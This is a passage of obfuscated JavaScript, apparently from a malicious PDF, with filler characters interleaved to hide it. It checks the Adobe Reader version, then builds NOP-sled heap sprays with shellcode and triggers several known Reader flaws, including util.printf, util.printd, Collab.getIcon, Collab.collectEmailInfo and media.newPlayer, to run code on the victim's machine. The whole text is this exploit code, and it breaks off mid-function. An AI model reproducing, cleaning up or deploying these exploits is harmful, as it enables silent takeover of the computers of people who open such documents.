YYY6YYY3YYY%YYYuYYYFYYYFYYYFYYY8YYY%YYYuYYY4YYYEYYY6YYY5YYY%YYYuYYY5YYY9YYY8YYY7YYY%YYYuYYY5YYY9YYY5YYY9YYY%YYYuYYYEYYY8YYY2YYY8YYY%YYYuYYY4YYYAYYYAYYY8YYY%YYYuYYY6YYYCYYY9YYY5YYY%YYYuYYYFYYYDYYY2YYYCYYY%YYYuYYY7YYYEYYYDYYY8YYY%YYYuYYYDYYY5YYY4YYY4YYY%YYYuYYYBYYYCYYY9YYY0YYY%YYYuYYYDYYY6YYY8YYY9YYY%YYYuYYY1YYYDYYYFYYY8YYY%YYYuYYYBYYYDYYY4YYY7YYY\"YYY+YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYYdYYY_YYYuYYYrYYYlYYY+YYY\"YYY%YYYuYYY0YYY0YYYAYYY6YYY\"YYY;YYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYnYYYpYYYlYYYaYYYyYYYeYYYrYYY(YYY)YYY YYY{YYY\rYYY\nYYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYkYYYzYYYbYYYvYYYeYYY(YYY)YYY\rYYY\nYYY{YYY\rYYY\nYYYvYYYaYYYrYYY YYYeYYYoYYYbYYYwYYYeYYY=YYY\"YYYpYYY@YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY YYY:YYY YYYyYYYyYYYyYYYyYYY1YYY1YYY1YYY\"YYY;YYY\rYYY\nYYYuYYYtYYYiYYYlYYY.YYYpYYYrYYYiYYYnYYYtYYYdYYY(YYYeYYYoYYYbYYYwYYYeYYY,YYY YYYnYYYeYYYwYYY YYYDYYYaYYYtYYYeYYY(YYY)YYY)YYY;YYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYvYYYaYYYrYYY YYYgYYYrYYYiYYYzYYYxYYYwYYY=YYY1YYY2YYY0YYY0YYY0YYY;YYY\rYYY\nYYYjYYYuYYYcYYYoYYYbYYYuYYY=YYYnYYYeYYYwYYY YYYAYYYrYYYrYYYaYYYyYYY(YYY)YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYkYYYlYYYkYYYnYYYgYYY YYY=YYY YYY\"YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY\"YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYhYYYwYYYjYYYnYYYaYYYlYYYbYYY8YYY=YYYsYYYhYYYcYYYoYYYdYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY_YYYnYYYeYYYwYYYpYYYlYYYaYYYyYYYeYYYrYYY)YYY;YYY\rYYY\nYYYkYYYlYYYkYYYnYYYgYYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYYkYYYlYYYkYYYnYYYgYYY)YYY;YYY\rYYY\nYYYhYYYwYYYjYYYnYYYaYYYlYYYbYYY8YYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYYhYYYwYYYjYYYnYYYaYYYlYYYbYYY8YYY)YYY;YYY\rYYY\nYYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY(YYYkYYYlYYYkYYYnYYYgYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY YYY<YYY=YYY YYY0YYYxYYY8YYY0YYY0YYY0YYY)YYY{YYYkYYYlYYYkYYYnYYYgYYY+YYY=YYYkYYYlYYYkYYYnYYYgYYY;YYY}YYY\rYYY\nYYYkYYYlYYYkYYYnYYYgYYY=YYYkYYYlYYYkYYYnYYYgYYY.YYYsYYYuYYYbYYYsYYYtYYYrYYY(YYY0YYY,YYY0YYYxYYY8YYY0YYY0YYY0YYY YYY-YYY YYYhYYYwYYYjYYYnYYYaYYYlYYYbYYY8YYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY)YYY;YYY\rYYY\nYYYfYYYoYYYrYYY(YYYfYYYzYYYfYYYwYYYaYYYmYYY=YYY0YYY;YYYfYYYzYYYfYYYwYYYaYYYmYYY<YYYgYYYrYYYiYYYzYYYxYYYwYYY;YYYfYYYzYYYfYYYwYYYaYYYmYYY+YYY+YYY)YYY YYY{YYYjYYYuYYYcYYYoYYYbYYYuYYY[YYYfYYYzYYYfYYYwYYYaYYYmYYY]YYY=YYYkYYYlYYYkYYYnYYYgYYY YYY+YYY YYYhYYYwYYYjYYYnYYYaYYYlYYYbYYY8YYY;YYY}YYY\rYYY\nYYYiYYYfYYY(YYYgYYYrYYYiYYYzYYYxYYYwYYY)YYY{YYYkYYYzYYYbYYYvYYYeYYY(YYY)YYY;YYYkYYYzYYYbYYYvYYYeYYY(YYY)YYY;YYYtYYYrYYYyYYY YYY{YYYtYYYhYYYiYYYsYYY.YYYmYYYeYYYdYYYiYYYaYYY.YYYnYYYeYYYwYYYPYYYlYYYaYYYyYYYeYYYrYYY(YYYnYYYuYYYlYYYlYYY)YYY;YYY}YYY YYYcYYYaYYYtYYYcYYYhYYY(YYYeYYY)YYY YYY{YYY}YYYkYYYzYYYbYYYvYYYeYYY(YYY)YYY;YYY}YYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYpYYYrYYYiYYYnYYYtYYYfYYY(YYY)YYY YYY{YYY\rYYY\nYYY\rYYY\nYYYvYYYaYYYrYYY YYYpYYYaYYYyYYYlYYYoYYYaYYYdYYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY_YYYpYYYrYYYiYYYnYYYtYYYfYYY)YYY)YYY;YYY\rYYY\nYYY\rYYY\nYYYvYYYaYYYrYYY YYYnYYYoYYYpYYY YYY=YYY\"YYY\"YYY;YYY\rYYY\nYYYfYYYoYYYrYYY YYY(YYYiYYYCYYYnYYYtYYY=YYY1YYY2YYY8YYY;YYYiYYYCYYYnYYYtYYY>YYY=YYY0YYY;YYY-YYY-YYYiYYYCYYYnYYYtYYY)YYY YYYnYYYoYYYpYYY YYY+YYY=YYY YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY\"YYY)YYY;YYY\rYYY\nYYYhYYYeYYYaYYYpYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYnYYYoYYYpYYY YYY+YYY YYYpYYYaYYYyYYYlYYYoYYYaYYYdYYY;YYY\rYYY\nYYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY\"YYY)YYY;YYY\rYYY\nYYYhYYYeYYYaYYYdYYYeYYYrYYYsYYYiYYYzYYYeYYY YYY=YYY YYY2YYY0YYY;YYY\rYYY\nYYYsYYYpYYYrYYYaYYYyYYY YYY=YYY YYYhYYYeYYYaYYYdYYYeYYYrYYYsYYYiYYYzYYYeYYY+YYYhYYYeYYYaYYYpYYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY;YYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY YYY(YYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY<YYYsYYYpYYYrYYYaYYYyYYY)YYY YYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY+YYY=YYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY;YYY\rYYY\nYYYfYYYiYYYlYYYlYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY.YYYsYYYuYYYbYYYsYYYtYYYrYYYiYYYnYYYgYYY(YYY0YYY,YYY YYYsYYYpYYYrYYYaYYYyYYY)YYY;YYY\rYYY\nYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY.YYYsYYYuYYYbYYYsYYYtYYYrYYYiYYYnYYYgYYY(YYY0YYY,YYY YYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY-YYYsYYYpYYYrYYYaYYYyYYY)YYY;YYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY(YYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY+YYYsYYYpYYYrYYYaYYYyYYY YYY<YYY YYY0YYYxYYY4YYY0YYY0YYY0YYY0YYY)YYY YYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYbYYYlYYYoYYYcYYYkYYY+YYYbYYYlYYYoYYYcYYYkYYY+YYYfYYYiYYYlYYYlYYYbYYYlYYYoYYYcYYYkYYY;YYY\rYYY\nYYYmYYYeYYYmYYY YYY=YYY YYYnYYYeYYYwYYY YYYAYYYrYYYrYYYaYYYyYYY(YYY)YYY;YYY\rYYY\nYYYfYYYoYYYrYYY YYY(YYYiYYY=YYY0YYY;YYYiYYY<YYY1YYY4YYY0YYY0YYY;YYYiYYY+YYY+YYY)YYY YYYmYYYeYYYmYYY[YYYiYYY]YYY YYY=YYY YYYbYYYlYYYoYYYcYYYkYYY YYY+YYY YYYhYYYeYYYaYYYpYYYbYYYlYYYoYYYcYYYkYYY;YYY\rYYY\nYYY\rYYY\nYYYvYYYaYYYrYYY YYYnYYYuYYYmYYY YYY=YYY YYY1YYY2YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY;YYY\rYYY\nYYYuYYYtYYYiYYYlYYY.YYYpYYYrYYYiYYYnYYYtYYYfYYY(YYY\"YYY%YYY4YYY5YYY0YYY0YYY0YYYfYYY\"YYY,YYYnYYYuYYYmYYY)YYY;YYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYgYYYeYYYtYYYiYYYcYYYoYYYnYYY(YYY)YYY YYY{YYY\rYYY\nYYY\rYYY\nYYYvYYYaYYYrYYY YYYsYYYhYYYeYYYlYYYlYYYcYYYoYYYdYYYeYYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY_YYYgYYYeYYYtYYYiYYYcYYYoYYYnYYY)YYY)YYY;YYY\rYYY\nYYY\rYYY\nYYYgYYYaYYYrYYYbYYYaYYYgYYYeYYY YYY=YYY YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY\"YYY)YYY YYY+YYY YYYsYYYhYYYeYYYlYYYlYYYcYYYoYYYdYYYeYYY;YYY\rYYY\nYYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY\"YYY)YYY;YYY YYY\rYYY\nYYYhYYYeYYYaYYYdYYYeYYYrYYYsYYYiYYYzYYYeYYY YYY=YYY YYY1YYY0YYY;YYY\rYYY\nYYYaYYYcYYYlYYY YYY=YYY YYYhYYYeYYYaYYYdYYYeYYYrYYYsYYYiYYYzYYYeYYY+YYYgYYYaYYYrYYYbYYYaYYYgYYYeYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY;YYY\rYYY\nYYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY YYY(YYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY<YYYaYYYcYYYlYYY)YYY YYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY+YYY=YYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY;YYY\rYYY\nYYYfYYYiYYYlYYYlYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY.YYYsYYYuYYYbYYYsYYYtYYYrYYYiYYYnYYYgYYY(YYY0YYY,YYY YYYaYYYcYYYlYYY)YYY;YYY\rYYY\nYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY.YYYsYYYuYYYbYYYsYYYtYYYrYYYiYYYnYYYgYYY(YYY0YYY,YYY YYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY-YYYaYYYcYYYlYYY)YYY;YYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY(YYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY+YYYaYYYcYYYlYYY<YYY0YYYxYYY4YYY0YYY0YYY0YYY0YYY)YYY YYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYbYYYlYYYoYYYcYYYkYYY+YYYbYYYlYYYoYYYcYYYkYYY+YYYfYYYiYYYlYYYlYYYbYYYlYYYoYYYcYYYkYYY;YYY\rYYY\nYYYmYYYeYYYmYYYoYYYrYYYyYYY YYY=YYY YYYnYYYeYYYwYYY YYYAYYYrYYYrYYYaYYYyYYY(YYY)YYY;YYY\rYYY\nYYYfYYYoYYYrYYY YYY(YYYiYYY=YYY0YYY;YYYiYYY<YYY1YYY8YYY0YYY;YYYiYYY+YYY+YYY)YYY YYYmYYYeYYYmYYYoYYYrYYYyYYY[YYYiYYY]YYY YYY=YYY YYYbYYYlYYYoYYYcYYYkYYY YYY+YYY YYYgYYYaYYYrYYYbYYYaYYYgYYYeYYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYbYYYuYYYfYYYfYYYeYYYrYYYsYYYiYYYzYYYeYYY YYY=YYY YYY4YYY0YYY1YYY2YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYbYYYuYYYfYYYfYYYeYYYrYYY YYY=YYY YYYAYYYrYYYrYYYaYYYyYYY(YYYbYYYuYYYfYYYfYYYeYYYrYYYsYYYiYYYzYYYeYYY)YYY;YYY\rYYY\nYYYfYYYoYYYrYYY YYY(YYYiYYY=YYY0YYY;YYY YYYiYYY<YYYbYYYuYYYfYYYfYYYeYYYrYYYsYYYiYYYzYYYeYYY;YYY YYYiYYY+YYY+YYY)YYY\rYYY\nYYY{YYY\rYYY\nYYYbYYYuYYYfYYYfYYYeYYYrYYY[YYYiYYY]YYY YYY=YYY YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYY0YYYaYYY%YYY0YYYaYYY%YYY0YYYaYYY%YYY0YYYaYYY\"YYY)YYY;YYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYCYYYoYYYlYYYlYYYaYYYbYYY.YYYgYYYeYYYtYYYIYYYcYYYoYYYnYYY(YYYbYYYuYYYfYYYfYYYeYYYrYYY+YYY\"YYY_YYYNYYY.YYYbYYYuYYYnYYYdYYYlYYYeYYY\"YYY)YYY;YYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYcYYYoYYYlYYYlYYYaYYYbYYY(YYY)YYY YYY{YYY\rYYY\nYYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYfYYYiYYYxYYY_YYYiYYYtYYY(YYYyYYYaYYYrYYYsYYYpYYY,YYYlYYYeYYYnYYY)YYY YYY{YYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY(YYYyYYYaYYYrYYYsYYYpYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY*YYY2YYY<YYYlYYYeYYYnYYY)YYY YYY{YYY YYYyYYYaYYYrYYYsYYYpYYY+YYY=YYYyYYYaYYYrYYYsYYYpYYY;YYY YYY}YYY\rYYY\nYYYyYYYaYYYrYYYsYYYpYYY=YYYyYYYaYYYrYYYsYYYpYYY.YYYsYYYuYYYbYYYsYYYtYYYrYYYiYYYnYYYgYYY(YYY0YYY,YYYlYYYeYYYnYYY/YYY2YYY)YYY;YYY\rYYY\nYYYrYYYeYYYtYYYuYYYrYYYnYYY YYYyYYYaYYYrYYYsYYYpYYY;YYY YYY}YYY\rYYY\nYYYvYYYaYYYrYYY YYYsYYYhYYYeYYYlYYYlYYYcYYYoYYYdYYYeYYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY_YYYcYYYoYYYlYYYlYYYaYYYbYYY)YYY)YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYmYYYeYYYmYYY_YYYaYYYrYYYrYYYaYYYyYYY=YYYnYYYeYYYwYYY YYYAYYYrYYYrYYYaYYYyYYY(YYY)YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYcYYYcYYY=YYY0YYYxYYY0YYYcYYY0YYYcYYY0YYYcYYY0YYYcYYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYaYYYdYYYdYYYrYYY=YYY0YYYxYYY4YYY0YYY0YYY0YYY0YYY0YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYsYYYcYYY_YYYlYYYeYYYnYYY=YYYsYYYhYYYeYYYlYYYlYYYcYYYoYYYdYYYeYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY*YYY2YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYlYYYeYYYnYYY=YYYaYYYdYYYdYYYrYYY-YYY(YYYsYYYcYYY_YYYlYYYeYYYnYYY+YYY0YYYxYYY3YYY8YYY)YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYyYYYaYYYrYYYsYYYpYYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY\"YYY)YYY;YYY\rYYY\nYYYyYYYaYYYrYYYsYYYpYYY=YYYfYYYiYYYxYYY_YYYiYYYtYYY(YYYyYYYaYYYrYYYsYYYpYYY,YYYlYYYeYYYnYYY)YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYcYYYoYYYuYYYnYYYtYYY2YYY=YYY(YYYcYYYcYYY-YYY0YYYxYYY4YYY0YYY0YYY0YYY0YYY0YYY)YYY/YYYaYYYdYYYdYYYrYYY;YYY\rYYY\nYYYfYYYoYYYrYYY(YYYvYYYaYYYrYYY YYYcYYYoYYYuYYYnYYYtYYY=YYY0YYY;YYYcYYYoYYYuYYYnYYYtYYY<YYYcYYYoYYYuYYYnYYYtYYY2YYY;YYYcYYYoYYYuYYYnYYYtYYY+YYY+YYY)YYY YYY{YYYmYYYeYYYmYYY_YYYaYYYrYYYrYYYaYYYyYYY[YYYcYYYoYYYuYYYnYYYtYYY]YYY=YYYyYYYaYYYrYYYsYYYpYYY+YYYsYYYhYYYeYYYlYYYlYYYcYYYoYYYdYYYeYYY;YYY YYY}YYY\rYYY\nYYYvYYYaYYYrYYY YYYoYYYvYYYeYYYrYYYfYYYlYYYoYYYwYYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYYuYYY0YYYcYYY0YYYcYYY%YYYuYYY0YYYcYYY0YYYcYYY\"YYY)YYY;YYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY(YYYoYYYvYYYeYYYrYYYfYYYlYYYoYYYwYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY<YYY4YYY4YYY9YYY5YYY2YYY)YYY YYY{YYYoYYYvYYYeYYYrYYYfYYYlYYYoYYYwYYY+YYY=YYYoYYYvYYYeYYYrYYYfYYYlYYYoYYYwYYY;YYY YYY}YYY\rYYY\nYYYtYYYhYYYiYYYsYYY.YYYcYYYoYYYlYYYlYYYaYYYbYYYSYYYtYYYoYYYrYYYeYYY=YYYCYYYoYYYlYYYlYYYaYYYbYYY.YYYcYYYoYYYlYYYlYYYeYYYcYYYtYYYEYYYmYYYaYYYiYYYlYYYIYYYnYYYfYYYoYYY(YYY YYY{YYY YYYsYYYuYYYbYYYjYYY:YYY\"YYY\"YYY,YYYmYYYsYYYgYYY:YYYoYYYvYYYeYYYrYYYfYYYlYYYoYYYwYYY YYY}YYY YYY)YYY;YYY YYY\rYYY\nYYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYaYYYPYYYlYYYuYYYgYYYiYYYnYYYsYYY YYY=YYY YYYaYYYpYYYpYYY.YYYpYYYlYYYuYYYgYYYIYYYnYYYsYYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYsYYYvYYY=YYYpYYYaYYYrYYYsYYYeYYYIYYYnYYYtYYY(YYYaYYYpYYYpYYY.YYYvYYYiYYYeYYYwYYYeYYYrYYYVYYYeYYYrYYYsYYYiYYYoYYYnYYY.YYYtYYYoYYYSYYYtYYYrYYYiYYYnYYYgYYY(YYY)YYY.YYYcYYYhYYYaYYYrYYYAYYYtYYY(YYY0YYY)YYY)YYY;YYY\rYYY\nYYYfYYYoYYYrYYY YYY(YYYvYYYaYYYrYYY YYYiYYY=YYY0YYY;YYY YYYiYYY YYY<YYY YYYaYYYPYYYlYYYuYYYgYYYiYYYnYYYsYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY;YYY YYYiYYY+YYY+YYY)YYY\rYYY\nYYY YYY YYY{YYY\rYYY\nYYY YYY YYY YYY YYYiYYYfYYY YYY(YYYaYYYPYYYlYYYuYYYgYYYiYYYnYYYsYYY[YYYiYYY]YYY.YYYnYYYaYYYmYYYeYYY=YYY=YYY\"YYYEYYYSYYYcYYYrYYYiYYYpYYYtYYY\"YYY)YYY\rYYY\nYYY YYY YYY YYY YYY YYY YYY{YYY\rYYY\nYYY YYY YYY YYY YYY YYY YYY YYY YYYvYYYaYYYrYYY YYYlYYYvYYY=YYYaYYYPYYYlYYYuYYYgYYYiYYYnYYYsYYY[YYYiYYY]YYY.YYYvYYYeYYYrYYYsYYYiYYYoYYYnYYY;YYY\rYYY\nYYY YYY YYY YYY YYY YYY YYY}YYY\rYYY\nYYY YYY YYY}YYY YYY YYY\rYYY\nYYYiYYYfYYY YYY(YYY(YYYlYYYvYYY=YYY=YYY9YYY)YYYYYYYYY(YYY(YYYsYYYvYYY=YYY=YYY8YYY)YYY&YYY&YYY(YYYlYYYvYYY<YYY=YYY8YYY.YYY1YYY2YYY)YYY)YYY)YYY\rYYY\nYYY YYY YYY{YYY\rYYY\nYYY YYY YYY YYY YYYgYYYeYYYtYYYiYYYcYYYoYYYnYYY(YYY)YYY;YYY\rYYY\nYYY YYY YYY}YYY\rYYY\nYYYeYYYlYYYsYYYeYYY YYYiYYYfYYY YYY(YYYlYYYvYYY=YYY=YYY7YYY.YYY1YYY)YYY\rYYY\nYYY YYY YYY{YYY\rYYY\nYYY YYY YYY YYY YYYpYYYrYYYiYYYnYYYtYYYfYYY(YYY)YYY;YYY\rYYY\nYYY YYY 